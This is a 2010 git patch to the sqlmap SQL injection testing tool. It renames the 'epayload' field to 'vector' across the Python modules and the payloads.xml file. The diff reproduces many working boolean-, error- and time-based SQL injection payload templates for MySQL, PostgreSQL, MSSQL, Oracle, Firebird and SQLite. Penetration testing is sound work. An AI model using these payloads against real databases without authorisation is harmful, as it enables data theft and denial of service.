From 11058667e440c30b31e7f609e0296b18ea8b97d6 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Fri, 3 Dec 2010 14:45:13 +0000 Subject: [PATCH] Better naming --- lib/controller/checks.py | 8 ++-- lib/request/inject.py | 4 +- lib/techniques/error/use.py | 4 +- xml/payloads.xml | 86 +++++++++++++++++++------------------ 4 files changed, 52 insertions(+), 50 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index f82ab0583..3579344fc 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -363,17 +363,17 @@ def checkSqlInjection(place, parameter, value): injection.suffix = suffix injection.clause = clause - if "epayload" in test and test.epayload is not None: - epayload = "%s%s" % (test.epayload, comment) + if "vector" in test and test.vector is not None: + vector = "%s%s" % (test.vector, comment) else: - epayload = None + vector = None # Feed with test details every time a test is successful injection.data[stype] = advancedDict() injection.data[stype].title = title injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload, False) injection.data[stype].where = where - injection.data[stype].epayload = epayload + injection.data[stype].vector = vector injection.data[stype].comment = comment if "details" in test: diff --git a/lib/request/inject.py b/lib/request/inject.py index eac83bb39..c9413de9c 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -98,8 +98,8 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r parameter through a bisection algorithm. """ - if kb.injection.data[1].epayload is not None: - vector = agent.cleanupPayload(kb.injection.data[1].epayload) + if kb.injection.data[1].vector is not None: + vector = agent.cleanupPayload(kb.injection.data[1].vector) else: vector = queries[kb.misc.testedDbms].inference.query diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 9747cc84c..e74f625d5 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -34,8 +34,8 @@ def errorUse(expression): """ output = None - query = agent.cleanupPayload(kb.injection.data[2].epayload) - query = unescaper.unescape(query) + vector = agent.cleanupPayload(kb.injection.data[2].vector) + query = unescaper.unescape(vector) query = agent.prefixQuery(query) query = agent.suffixQuery(query) check = "%s(?P.*?)%s" % (kb.misc.start, kb.misc.stop) diff --git a/xml/payloads.xml b/xml/payloads.xml index 7712b4d64..1d6b880dc 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -126,7 +126,7 @@ Tag: original value to its negative representation 3: Replace the parameter original value - Sub-tag: + Sub-tag: The payload that will be used to exploit the injection point. Sub-tag: @@ -190,7 +190,7 @@ Formats: - + @@ -395,6 +395,7 @@ Formats: + @@ -605,7 +607,7 @@ Formats: 1 1 1 - + AND [RANDNUM]=[RANDNUM] @@ -621,7 +623,7 @@ Formats: 3 1 1 - + OR [RANDNUM]=[RANDNUM] @@ -640,7 +642,7 @@ Formats: 1 2,3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) @@ -660,7 +662,7 @@ Formats: 1 2,3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) @@ -679,7 +681,7 @@ Formats: 1 3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) @@ -698,7 +700,7 @@ Formats: 1 3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) @@ -711,7 +713,7 @@ Formats: - + Generic boolean-based blind - GROUP BY and ORDER BY clauses (append) 1 @@ -719,7 +721,7 @@ Formats: 1 2,3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) @@ -735,7 +737,7 @@ Formats: 1 2,3 3 - (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) @@ -755,7 +757,7 @@ Formats: 1 2,3 3 - + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) @@ -774,7 +776,7 @@ Formats: 1 3 3 - + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) @@ -793,7 +795,7 @@ Formats: 1 3 3 - + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) @@ -806,7 +808,7 @@ Formats: - + Generic boolean-based blind - GROUP BY and ORDER BY clauses (replace) 1 @@ -814,7 +816,7 @@ Formats: 1 2,3 3 - + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) @@ -833,7 +835,7 @@ Formats: 0 1 1 - AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) @@ -853,7 +855,7 @@ Formats: 0 1 1 - AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) + AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) @@ -872,7 +874,7 @@ Formats: 0 1 1 - AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) + AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) @@ -891,7 +893,7 @@ Formats: 0 1 1 - AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) @@ -910,7 +912,7 @@ Formats: 0 1 1 - AND [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') + AND [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') @@ -929,7 +931,7 @@ Formats: 2 1 1 - OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) @@ -949,7 +951,7 @@ Formats: 2 1 1 - OR [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) + OR [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) @@ -968,7 +970,7 @@ Formats: 2 1 1 - OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) + OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) @@ -987,7 +989,7 @@ Formats: 2 1 1 - OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) @@ -1006,7 +1008,7 @@ Formats: 2 1 1 - OR [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') + OR [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') @@ -1032,7 +1034,7 @@ Formats: 0 2,3 1 - , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) @@ -1052,7 +1054,7 @@ Formats: 0 2,3 1 - , (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) , (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) @@ -1071,7 +1073,7 @@ Formats: 0 3 1 - , (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) , (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) @@ -1090,7 +1092,7 @@ Formats: 0 3 1 - , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) @@ -1109,7 +1111,7 @@ Formats: 0 2,3 3 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) @@ -1129,7 +1131,7 @@ Formats: 0 2,3 3 - (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) @@ -1148,7 +1150,7 @@ Formats: 0 3 3 - (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) @@ -1167,7 +1169,7 @@ Formats: 0 3 3 - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) @@ -1419,7 +1421,7 @@ Formats: 1 1,2,3 1 - AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) + AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) AND SLEEP([SLEEPTIME]) @@ -1439,7 +1441,7 @@ Formats: 1 1,2,3 1 - AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) + AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) AND BENCHMARK(5000000, MD5('[SLEEPTIME]')) @@ -1458,7 +1460,7 @@ Formats: 1 1 1 - + AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000)))) @@ -1478,7 +1480,7 @@ Formats: 1 1 1 - + AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0 @@ -1506,7 +1508,7 @@ Formats: 3 1,2,3 1 - OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) + OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) OR SLEEP([SLEEPTIME]) @@ -1526,7 +1528,7 @@ Formats: 3 1,2,3 1 - OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) + OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) OR BENCHMARK(5000000, MD5('[SLEEPTIME]')) @@ -1545,7 +1547,7 @@ Formats: 3 1 1 - + OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000)))) @@ -1565,7 +1567,7 @@ Formats: 3 1 2 - + OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0